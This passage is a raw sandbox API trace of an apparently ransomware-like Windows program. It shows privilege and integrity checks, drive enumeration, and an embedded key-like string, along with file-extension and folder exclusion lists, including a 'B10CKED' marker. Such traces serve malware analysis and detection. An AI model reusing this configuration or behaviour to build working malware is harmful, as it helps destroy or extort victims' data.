SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, 
IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.505] GetCurrentProcess () returned 0xffffffff [0108.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0108.505] GetLastError () returned 0x7a [0108.505] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2a7700 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2a7700, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2a7700, ReturnLength=0x12fc64) returned 1 [0108.505] GetSidSubAuthorityCount (pSid=0x2a7708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2a7709 [0108.505] GetSidSubAuthority (pSid=0x2a7708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2a7710 [0108.505] LocalFree (hMem=0x2a7700) returned 0x0 [0108.505] CloseHandle (hObject=0xb8) returned 1 [0108.506] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0108.506] GetDriveTypeW 
(lpRootPathName="T:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0108.509] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0108.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.509] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0108.509] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0108.509] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0108.509] LockResource (hResData=0x516824) returned 0x516824 [0108.509] FreeResource (hResData=0x516824) returned 0 [0108.509] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.509] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.509] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.509] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.509] FreeResource (hResData=0x50d64c) returned 0 [0108.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL 
SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0108.514] CompareStringW (Locale=0x400, 